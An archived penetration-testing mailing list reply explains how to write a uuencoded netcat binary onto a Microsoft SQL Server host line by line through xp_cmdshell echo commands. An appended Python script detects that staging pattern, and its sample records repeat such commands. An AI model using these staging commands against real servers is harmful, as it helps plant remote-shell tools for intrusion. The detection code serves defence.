Penetration Testing mailing list archives
Re: TFTP and XP_CMDSHELL - Weird
From: Javier Fernandez-Sanguino <jfernandez () germinus com>
Date: Thu, 23 Jun 2005 19:24:02 +0200
Andres Molinetti wrote:
I think the problem is the tftp client. Does anyone know if MS has fixed it in any way not to allow downloads from low-privileged users?? or something like that??
Why use tftp? You can just create a uuencode file that will auto-decode itself when run. Try using
xp_cmdshell 'echo begin 666 nc.com >>c:\nc.com'
xp_cmdshell 'echo M6%!04%E:25%$6TPM9C8M9S0Q1T136'4G0"Q^4%Y07T\L(2A'52A'6BA';G4U >>c:\nc.com'
xp_cmdshell 'echo M+4Y%5%-%3D1?5C$N,#!?2E)4/0T*0T9&1E)8+&`L8#(D1CU`(70N<E$P)4EU >>c:\nc.com'
(...) and so on. I'll leave the rest up to you. There are some caveats when you want to pull that through HTTP but it works every time.

Regards
Javier
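
Added example, not part of the original post or thread: a detection sketch for the echo-append staging pattern the message describes, run over process-creation records. The record shape (parent image, command line), the sample events and the function name are assumptions constructed for illustration; it relies on xp_cmdshell commands running as cmd.exe children of sqlservr.exe.

```python
import re
from collections import defaultdict

# "echo <data> >><path>" as it appears on the cmd.exe command line.
ECHO_APPEND = re.compile(r'echo\s+(?P<data>.*?)\s*>>\s*(?P<path>\S+)\s*$', re.I)
UU_HEADER = re.compile(r'^begin\s+[0-7]{3,4}\s+\S+$')  # begin <mode> <name>
UU_BODY = re.compile(r'^M[\x20-\x60]{60}$')            # full 45-byte uuencode line
EXEC_EXT = ('.com', '.exe', '.bat', '.cmd', '.scr')

def find_echo_staging(events, min_body_lines=2):
    """events: iterable of (parent_image, command_line) records (assumed shape).
    Returns {target_path: [reasons]} for files assembled by echo-append
    from a SQL Server child process that look like staged encoded binaries."""
    writes = defaultdict(list)
    for parent, cmdline in events:
        if not parent.lower().endswith('sqlservr.exe'):
            continue                      # only children of the database engine
        m = ECHO_APPEND.search(cmdline)
        if m:
            writes[m.group('path').lower()].append(m.group('data'))
    findings = {}
    for path, chunks in writes.items():
        reasons = []
        if any(UU_HEADER.match(c) for c in chunks):
            reasons.append('uuencode header')
        if sum(1 for c in chunks if UU_BODY.match(c)) >= min_body_lines:
            reasons.append('uuencoded body lines')
        if path.endswith(EXEC_EXT):
            reasons.append('executable extension')
        if len(reasons) >= 2:             # require two signals to cut noise
            findings[path] = reasons
    return findings

# Constructed sample records (not taken from the post or any real host).
SQLSRV = r'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe'
SAMPLE = [
    (SQLSRV, r'cmd.exe /c echo begin 666 tool.com >>c:\tool.com'),
    (SQLSRV, 'cmd.exe /c echo M' + 'A' * 60 + r' >>c:\tool.com'),
    (SQLSRV, 'cmd.exe /c echo M' + 'B' * 60 + r' >>c:\tool.com'),
    (SQLSRV, r'cmd.exe /c echo backup ok >>d:\logs\job.log'),
    (r'C:\Windows\explorer.exe', r'cmd.exe /c echo begin 644 x.com >>c:\x.com'),
]

if __name__ == '__main__':
    for path, reasons in find_echo_staging(SAMPLE).items():
        print(path, reasons)
```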